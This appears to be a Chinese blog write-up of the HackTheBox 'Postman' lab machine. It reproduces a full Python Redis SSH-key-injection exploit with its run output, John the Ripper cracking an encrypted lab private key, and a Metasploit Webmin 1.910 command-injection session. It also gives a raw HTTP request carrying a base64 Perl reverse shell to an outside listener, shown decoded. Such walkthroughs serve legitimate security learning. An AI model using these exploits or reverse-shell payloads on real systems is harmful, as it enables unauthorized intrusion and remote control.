文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-02-11   1.9k

HTB::Postman Walkthrough

0x01 靶机介绍

0x02 使用工具和知识点

0x03 渗透过程

扫描目标主机所有端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[email protected]:~$ nmap -A -Pn -T4 -p- 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-09 23:18 EST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.34s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-server-header: MiniServ/1.910
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

主要来看一下80、6379和10000端口。

80端口:

6379端口:

10000端口:

通常80端口没有什么利用的东西,10000端口上运行Webmin服务尝试弱口令没有效果,而redis服务暴露在6379端口,可以从这里下手,Googleredis key store 4.0.9 expolit,找到下面利用方式

https://github.com/Avinash-acid/Redis-Server-Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/python
#Author : Avinash Kumar Thapa aka -Acid
#Twitter : https://twitter.com/m_avinash143
#####################################################################################################################################################

import os
import os.path
from sys import argv
from termcolor import colored


script, ip_address, username = argv


PATH='/usr/bin/redis-cli'
PATH1='/usr/local/bin/redis-cli'

def ssh_connection():
shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address
os.system(shell)

if os.path.isfile(PATH) or os.path.isfile(PATH1):
try:
print colored('\t*******************************************************************', "green")
print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green")
print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid" ', "green")
print colored('\t*******************************************************************', "green")
print "\n"
print colored("\t SSH Keys Need to be Generated", 'blue')
os.system('ssh-keygen -t rsa -C \"acid_creative\"')
print colored("\t Keys Generated Successfully", "blue")
os.system("(echo '\r\n\'; cat $HOME/.ssh/id_rsa.pub; echo \'\r\n\') > $HOME/.ssh/public_key.txt")
cmd = "redis-cli -h " + ip_address + ' flushall'
cmd1 = "redis-cli -h " + ip_address
os.system(cmd)
cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " + ip_address + ' -x set cracklist'
os.system(cmd2)
cmd3 = cmd1 + ' config set dbfilename "backup.db" '
cmd4 = cmd1 + ' config set dir' + " /usr/lib/"+username+"/.ssh/"
cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
cmd6 = cmd1 + ' save'
os.system(cmd3)
os.system(cmd4)
os.system(cmd5)
os.system(cmd6)
print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")
ssh_connection()

except:
print "Something went wrong"
else:
print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")

执行python2 exp.py 10.10.10.160 redis,SSH登录靶机:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
[email protected]:~/Desktop/HTB Scripts/Redis$ python2 exp.py 10.10.10.160 redis
*******************************************************************
* [+] [Exploit] Exploiting misconfigured REDIS SERVER*
* [+] AVINASH KUMAR THAPA aka "-Acid"
*******************************************************************


SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa.
Your public key has been saved in /home/kali/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:wMzHMZr3ew4dVP3cXrwsWg7JF7ay4peQHLplhK7BDww acid_creative
The key's randomart image is:
+---[RSA 3072]----+
| o .. |
| + + o . .|
| B = . oo|
| E = + . o *|
| + . S = + +.o|
| = o * B * o.|
| = + + % . |
| . o . O . |
| ..o . |
+----[SHA256]-----+
Keys Generated Successfully
OK
OK
OK
(error) ERR Changing directory: No such file or directory
OK
OK
You'll get shell in sometime..Thanks for your patience
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Feb 10 08:46:56 2020 from 10.10.15.125
[email protected]:~$ pwd
/var/lib/redis

直接查看/etc/passwd/home目录,发现有一个Matt用户,而且user.txt权限也属于Matt。设法提升权限,/opt目录下有一个id_rsa.bak文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

还可以用LinEnum.sh来查找敏感文件:

用ssh2john.py转换为John可识别的文件:

1
[email protected]:~/Desktop$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

再用John来破解RSA密码:

1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:~/Desktop$ /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa)
1g 0:00:00:35 DONE (2020-02-10 04:28) 0.02844g/s 408014p/s 408014c/s 408014C/sa6_123..*7¡Vamos!
Session completed

切换为Matt用户,读取user.txt文件:

1
2
3
4
5
[email protected]:~$ su Matt
Password:
[email protected]:/var/lib/redis$ cd /home/Matt/
[email protected]:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c

这里不能用id_rsa私钥文件来登录靶机,每次登录成功后都会出现Connection close

用lse.sh脚本查看root权限运行的进程,发现又在10000端口上的webmin,用Mattcomputer2008可以成功登录,Googlewebmin exploit,exploit-db上有如下利用方式:

https://www.exploit-db.com/exploits/46984

metasploit也收录这个漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Module options (exploit/linux/http/webmin_packageup_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10000 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Webmin <= 1.910

msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.113:4444
[+] Session cookie: ba61f4eadcffcce039b166a29defa004
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.113:4444 -> 10.10.10.160:46990) at
2019-12-24 17:43:52 -0500
cat /root/root.txt

a257741[-----------------]ddce

大概看了一下Payload的利用,应该是Webmin在管理升级软件的时候造成了命令注入,执行了额外的用户命令,也可以直接使用Burp Suite发送Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
POST /package-updates/update.cgi HTTP/1.1

Host: [RHOST]:[RPORT]

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Cookie: sid=[INPUT GOOD SID HERE]

Referer: [RHOST]:[RPORT]/package-updates/?xnavigation=1

Content-Type: application/x-www-form-urlencoded

Content-Length: 432

Connection: close



u=acl%2Fapt&u=[PAYLOAD HERE]

--------------------------------------------------------
POC Payload Info
URL decoded
| bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn}|{base64,-d}|{bash,-i}"

base64 decoded
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

all together decoded
| bash -c "{echo,perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'}|{base64,-d}|{bash,-i}"

0x04 Summary

“Postman”是基于Linux的靶机,首先利用Redis服务器,使攻击者可以生成自己的SSH公共密钥文件并将其写入服务器,以获取对系统的未授权访问并发现用户(Matt)的已加密的ssh密钥。 我们将获取到的加密的ssh密钥使用JohnTheRipper对其进行破解以获得ssh的密码。 之后,再利用10000端口上的Webmin Portal,以Matt的身份登录并访问Webmin面板。 最后,我们在Webmin面板中搜索了关于版本号的漏洞利用,并通过metasploit成功地利用了该漏洞并获得了root。

0x05 Reference

[https://github.com/Dog9w23/Webmin-1.910-Exploit/blob/master/Webmin 1.910 - Remote Code Execution using BurpSuite](https://github.com/Dog9w23/Webmin-1.910-Exploit/blob/master/Webmin 1.910 - Remote Code Execution using BurpSuite)

https://blog.csdn.net/test1988x/article/details/103921210

https://www.soeren.codes/2019/12/24/postbox-writeup/

Copyright © ca01h 2019-2020 | 本站总访问量